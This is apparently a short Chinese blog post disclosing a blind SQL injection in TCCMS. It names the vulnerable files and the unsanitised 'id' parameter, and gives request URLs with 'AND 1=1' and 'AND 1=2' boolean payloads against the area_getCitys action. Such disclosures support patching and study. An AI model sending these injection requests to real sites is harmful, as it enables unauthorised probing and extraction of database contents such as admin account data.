TCCMS SQL注入漏洞(盲注)

\app\controller\area.class.php中未对id进行处理,存在注入

\app\model\areaAction.class.php 下直接进行sql处理

访问:http://0day5.com/index.php?id=1&ac=area_getCitys正常显示

接着 http://0day5.com/index.php?id=1 AND 1=1&ac=area_getCitys

tccms1
再接着 http://0day5.com/index.php?id=1 AND 1=2&ac=area_getCitys
tccms2
本地测试 可判断出 管理员用户个数为1
tccms3

原文链接:,转发请注明来源!

发表评论

要发表评论,您必须先登录